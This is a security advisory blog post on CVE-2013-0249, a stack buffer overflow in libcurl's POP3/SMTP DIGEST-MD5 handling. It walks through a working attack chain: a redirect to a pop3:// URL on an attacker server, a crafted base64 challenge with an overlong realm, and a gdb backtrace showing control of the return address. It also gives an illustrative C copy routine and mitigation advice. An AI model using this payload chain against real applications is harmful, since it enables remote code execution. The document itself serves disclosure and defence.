Blog.Volema / cURL buffer overflow
URL:http://blog.volema.com/curl-rce.html
Volema found a remotely exploitable stack buffer overflow in libcurl's POP3 and SMTP protocol handlers that leads to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided by the server without proper length checks, and that data is then appended to a local fixed-size buffer on the stack. Because an ordinary HTTP redirect is enough to make libcurl speak POP3 to a host of the attacker's choosing, any application that fetches attacker-supplied URLs with redirects enabled is exposed, not only applications that use POP3 or SMTP on purpose.
Vendor notified; CVE-2013-0249 released. Affected: libcurl 7.26.0 through 7.28.1; fixed in 7.29.0.
Attack Concept Outline
Assume the target lets us make curl send an HTTP request to a URL we choose, and that it follows redirects. We point it at our server, http://evilserver.com/:
GET / HTTP/1.0
Host: evilserver.com
server answers with
HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/.
"smart" curl interprets the redirect and, since the Location is a pop3:// URL, connects to evilserver.com on 110/TCP speaking POP3. The server sends its greeting, curl asks for the server's capabilities (CAPA), and the server answers advertising DIGEST-MD5 as the only SASL mechanism:
+OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumby dumb POP3 server
so libcurl has to start a DIGEST-MD5 authentication (AUTH DIGEST-MD5), and
then the server sends the payload, its DIGEST-MD5 challenge, base64 encoded as POP3 SASL requires:
+cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=
which decodes to the challenge below. The overflow happens because the realm value is copied into a fixed-size stack buffer without checking its length, so a realm longer than the buffer overwrites whatever lies above it on the stack:
realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8
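The copy that goes wrong, as an added example in C that is not code from the post or from libcurl: the unbounded copy of a challenge value next to a bounded one, run on a constructed challenge shaped like the decoded one above. The 128-byte buffer, all function names and make_challenge() are assumptions; the base64 layer is left out and the challenge is handled already decoded. The bounded version rejects a realm that does not fit rather than truncating it, and the A-filled realm is generated at whatever length you want, so the example covers lengths beyond the one shown above.

```c
/* Added example, not code from the Volema post or from libcurl: the copy
 * pattern CVE-2013-0249 describes, unbounded beside bounded. REALM_MAX, all
 * names and the constructed challenge are assumptions for illustration. */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REALM_MAX 128   /* assumed size of the realm stack buffer */

/* Start of the value that follows `key` in the challenge, or NULL. */
static const char *find_value(const char *chlg, const char *key)
{
    const char *p = chlg ? strstr(chlg, key) : NULL;
    return p ? p + strlen(key) : NULL;
}

/* Vulnerable pattern: copy until end_char with no bound on `value`. A realm
 * longer than the stack buffer overwrites the saved return address, which is
 * what the 0x4141414141414141 frames in the backtrace that follows show. */
static bool get_key_value_unbounded(const char *chlg, const char *key,
                                    char *value, char end_char)
{
    const char *p = find_value(chlg, key);
    if(!p)
        return false;
    while(*p && *p != end_char)
        *value++ = *p++;
    *value = '\0';
    return true;
}

/* Hardened form: at most max_val_len - 1 bytes plus NUL, and the challenge
 * is rejected rather than silently truncated when the value does not fit. */
static bool get_key_value_bounded(const char *chlg, const char *key,
                                  char *value, size_t max_val_len,
                                  char end_char)
{
    const char *p = find_value(chlg, key);
    size_t i = 0;
    if(!p || max_val_len == 0)
        return false;
    for(; *p && *p != end_char; ++p) {
        if(i + 1 >= max_val_len)
            return false;           /* fail closed */
        value[i++] = *p;
    }
    value[i] = '\0';
    return true;
}

/* Constructed test data: a challenge shaped like the decoded one in the post
 * with a realm of n 'A' bytes (base64 wrapping omitted). Caller frees it. */
static char *make_challenge(size_t n)
{
    const char *head = "realm=\"";
    const char *tail = "\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\","
                       "algorithm=md5-sess,charset=utf-8";
    size_t hl = strlen(head);
    char *chlg = malloc(hl + n + strlen(tail) + 1);
    if(!chlg)
        return NULL;
    memcpy(chlg, head, hl);
    memset(chlg + hl, 'A', n);
    strcpy(chlg + hl + n, tail);
    return chlg;
}

/* Parse realm into a REALM_MAX stack buffer with the bounded copy; returns
 * the accepted length or -1 when the challenge is rejected. */
static int parse_realm_safely(const char *chlg)
{
    char realm[REALM_MAX];
    if(!get_key_value_bounded(chlg, "realm=\"", realm, sizeof(realm), '"'))
        return -1;
    return (int)strlen(realm);
}

/* Bytes (value plus NUL) the unbounded copy would write, without doing it. */
static size_t unbounded_write_size(const char *chlg)
{
    const char *p = find_value(chlg, "realm=\"");
    size_t n = 0;
    if(!p)
        return 0;
    while(p[n] && p[n] != '"')
        n++;
    return n + 1;
}

/* Bounded parse result for a realm of n bytes (builds and frees the data). */
static int realm_result(size_t n)
{
    char *chlg = make_challenge(n);
    int r = parse_realm_safely(chlg);
    free(chlg);
    return r;
}

int main(void)
{
    char *evil = make_challenge(4096);
    printf("realm of 16 bytes: %d, of 127: %d, of 128: %d (rejected)\n",
           realm_result(16), realm_result(127), realm_result(128));
    printf("evil realm: unbounded copy would write %zu bytes into %d\n",
           unbounded_write_size(evil), REALM_MAX);
    free(evil);
    return 0;
}
```

The unbounded copy is deliberately never run on the long realm here, since doing so is exactly the crash the backtrace shows; it is only exercised on values that fit, to make the contrast with the bounded form visible.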
How it looks in gdb:
Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000
The crash is in a libc routine called from Curl_sasl_create_digest_md5_message(); every frame above it is 0x4141414141414141, the 'A' bytes of the realm that gdb now unwinds as saved return addresses, so the attacker controls the return address and the stack contents above it. The last frame, 0x656d616e72657375, is the ASCII string "username" read as a little-endian 64-bit value: stack data past the overflow, not code.
Original exploit: pop3d.py.
Mitigation
Restrict the protocols your application lets libcurl use to HTTP(S), both for the initial request (CURLOPT_PROTOCOLS) and, more importantly, for anything reached by following a redirect (CURLOPT_REDIR_PROTOCOLS); a single Location header is all the attacker needs here. Then update libcurl: the bug is fixed in 7.29.0. Disabling redirects altogether (CURLOPT_FOLLOWLOCATION off) also closes this path, but the protocol restriction is the durable fix, since it also keeps every other non-HTTP handler out of reach of a redirect.